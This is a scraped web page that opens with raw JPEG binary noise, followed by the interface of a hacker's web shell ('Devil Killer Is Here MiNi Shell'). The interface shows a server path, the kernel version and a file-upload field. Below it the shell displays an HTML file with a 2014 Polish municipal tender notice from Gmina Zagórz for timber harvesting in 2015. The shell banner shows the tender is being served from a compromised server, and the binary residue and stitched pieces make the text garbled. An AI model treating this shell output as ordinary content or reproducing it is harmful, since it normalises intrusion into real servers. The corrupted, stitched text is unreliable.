JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141204/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141204/397980-N-2014.html

<p class="kh_header"><b>Zagórz: Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz
w roku 2015</b><br>
<b>Numer ogłoszenia: 397980 - 2014; data zamieszczenia: 04.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagórz , ul. 3 Maja 2, 38-540 Zagórz, woj. podkarpackie, tel. 013 4622062, faks 013 4622062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagorz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz
w roku 2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje pozyskanie i zrywkę drewna z lasów mienia Gminy Zagórz w 10 sołectwach, tj.: Czaszyn, Łukowe, Mokre, Morochów, Olchowa, Poraż, Średnie Wielkie, Tarnawa Dolna, Tarnawa Górna, Zahutyń oraz w 2 osiedlach, tj.: Zagórz Osiedle Wielopole, Zagórz Osiedle Zasław Za Torami. 
Szczegóły zakresu usług określa załącznik nr 3 - Opis przedmiotu zamówienia, oraz załącznik nr 4 -  Opis sposobu wykonania zamówienia. 
 Wykonawca jest zobowiązany w cenie ofertowej uwzględnić wszystkie koszty niezbędne do prawidłowej realizacji zamówienia.
Zamawiający dopuszcza możliwości złożenia ofert częściowych. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy. Zadanie nie może być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu zostaną odrzucone.
Składanie ofert częściowych jest dopuszczalne dla następujących zadań:
1.	Sołectwo Czaszyn
2.	Sołectwo Łukowe
3.	Sołectwo Mokre
4.	Sołectwo Morochów
5.	Sołectwo Olchowa
6.	Sołectwo Poraż
7.	Sołectwo Średnie Wielkie
8.	Sołectwo Tarnawa Dolna
9.	Sołectwo Tarnawa Górna
10.	Zagórz Osiedle Wielopole
11.	Sołectwo Zahutyń
12.	Zagórz Osiedle Zasław Za Torami
Zamawiający nie zastrzega żadnej części jako zakazanej do powierzenia podwykonawcom..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Jeżeli w okresie trzech lat od udzielenia zamówienia zajdzie konieczność udzielenia zamówień uzupełniających przewidzianych w ogłoszeniu dla niniejszego zamówienia, a stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, Zamawiający w oparciu o przepisy art. 67 ust. 1 pkt. 6 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, powierzy ich wykonanie w trybie zamówienia z wolnej ręki. 
Zakres robót uzupełniających oraz związane z tym terminy i wynagrodzenia zostaną określone odrębną umową.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca obowiązany jest wnieść wadium w wysokościach:
- 2 000 zł (słownie: dwa tysiące złotych) dla części 1 zamówienia (sołectwo Czaszyn),
- 1 400 zł (słownie: jeden tysiąc czterysta złotych) dla części 2 zamówienia (sołectwo Łukowe),
- 1 200 zł (słownie: jeden tysiąc dwieście złotych) dla części 3 zamówienia (sołectwo Mokre),
- 200 zł (słownie: dwieście złotych) dla części 4 zamówienia (sołectwo Morochów),
- 300 zł (słownie: trzysta złotych) dla części 5 zamówienia (sołectwo Olchowa),
- 600 zł (słownie: sześćset złotych) dla części 6 zamówienia (sołectwo Poraż),
- 100 zł (słownie: sto złotych) dla części 7 zamówienia (sołectwo Średnie Wielkie),
- 200 zł (słownie: dwieście złotych) dla części 8 zamówienia (sołectwo Tarnawa Dolna),
- 400 zł (słownie: czterysta złotych) dla części 9 zamówienia (sołectwo Tarnawa Górna),
- 1 400 zł (słownie: jeden tysiąc czterysta złotych) dla części 10 zamówienia (osiedle Wielopole),
- 500 zł (słownie: pięćset złotych) dla części 11 zamówienia (sołectwo Zahutyń),
- 200 zł (słownie: dwieście złotych) dla części 12 zamówienia (osiedle Zasław Za Torami).

Jeżeli Wykonawca składa ofertę na wszystkie części zamówienia wnosi wadium o łącznej wysokości 
8 500 zł (słownie: osiem tysięcy pięćset złotych).
2. Wadium należy złożyć przed upływem terminu składania ofert w sposób stosowny do jego formy. Wadium może być wniesione w: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym	że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 	listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 	1158 ze zm.).
3. W przypadku wnoszenia wadium w pieniądzu należy dokonać wpłaty przelewem na rachunek banku: 
Bank PEKAO S. A. I Oddział w Sanoku Nr rach. 47 1240 2340 1111 0010 4389 6489.
Zaleca się, by wadium w formie poręczeń lub gwarancji składać w oryginale. Nie jest wskazane trwałe wpinanie oryginału dokumentu wadialnego do oferty w przypadku woli jego zwrócenia w sytuacjach określonych ustawą.
Wykonawców, którzy nie wnieśli wadium odpowiadającego powyższym wymaganiom wyklucza się.
4. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art. 46 ust. 4a ustawy. 
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
Zamawiający zwróci niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
6. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium
na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie,               o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz  z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt  5.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednego zamówienia o podobnym charakterze jak przedmiot zamówienia, tj. usługi pozyskiwania i zrywki drewna:
a)	w przypadku składania oferty na:
- zadanie nr 1 sołectwo Czaszyn - zamówienie o wartości nie mniejszej niż 70 000,00 zł brutto
- zadanie nr 2 sołectwo Łukowe - zamówienie o wartości nie mniejszej niż 50 000,00 zł brutto
- zadanie nr 3 sołectwo Mokre - zamówienie o wartości nie mniejszej niż 40 000,00 zł brutto
- zadanie nr 10 Zagórz Osiedle Wielopole - zamówienie o wartości nie mniejszej niż 50 000,00 zł brutto
b)	w przypadku składania oferty na: zadanie nr 4 sołectwo Morochów, zadanie nr 5 sołectwo Olchowa, zadanie nr 6 sołectwo Poraż, zadanie nr 7 sołectwo Średnie Wielkie, zadanie nr 8 sołectwo Tarnawa Dolna, zadanie nr 9 sołectwo Tarnawa Górna, zadanie nr 11 sołectwo Zahutyń, zadanie nr 12 Zagórz Osiedle Zasław Za Torami - Zamawiający nie precyzuje warunków udziału w postępowaniu.  Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz 
z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt.  5.1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje:
a)	w przypadku składania oferty na jedno zadanie co najmniej:
- dwiema profesjonalnymi pilarkami spalinowymi,
- jednym specjalistycznym ciągnikiem przystosowanym do zrywki mechanicznej drewna (skider, forwarder) lub jeden ciągnik rolniczy przystosowany do zrywki drewna, 
b)	w przypadku składania oferty na więcej niż jedno zadanie co najmniej:
- trzema profesjonalnymi pilarkami spalinowymi,
- dwoma specjalistycznymi ciągnikami przystosowanymi do zrywki mechanicznej drewna (skider, forwarder), lub dwoma ciągnikami rolniczymi przystosowanymi do zrywki drewna,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wskazać osoby, które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi odpowiednimi do funkcji, jakie zostaną im powierzone. 
Zamawiający uzna powyższy warunek za spełniony o ile wykonawca wykaże, iż dysponuje osobami posiadającymi zaświadczenie ukończenia kursu zawodowego uprawniającego do pracy pilarkami spalinowymi:
a)	w przypadku składania oferty na jedno zadanie - co najmniej dwoma osobami posiadającymi zaświadczenie ukończenia kursu zawodowego uprawniającego do pracy pilarkami spalinowymi.
b)	w przypadku składania oferty na więcej niż jedno zadanie co najmniej trzema osobami posiadającymi zaświadczenie ukończenia kursu zawodowego uprawniającego do pracy pilarkami spalinowymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz  z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt  5.1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Za najważniejsze usługi, dla których należy przedstawić dowody, uznaje się usługi niezbędne do wykazania spełniania warunku określonego w pkt 4.2.2. SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wypełniony formularz cenowy oraz ofertowy - wg wzoru stanowiącego załącznik nr 1 i nr 2 do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności faktury - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie:
1.	Termin realizacji zamówienia może ulec zmianie w sytuacji wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających realizację usług.
2.	Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:
a)	zmniejszenie zakresu rzeczowego wykonanych usług,
b)	zmiana stawki urzędowej podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zagorz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Zagórzu, ul. 3 Maja 2, II piętro, pok. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2014 godzina 10:00, miejsce: Urząd Miasta i Gminy w Zagórzu, ul. 3 Maja 2, parter, kancelaria ogólna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Czaszyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-3 km, w ilości 1000 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Łukowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od  2-2,5 km km, w ilości 700 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Mokre.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-3 km, w ilości 600 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
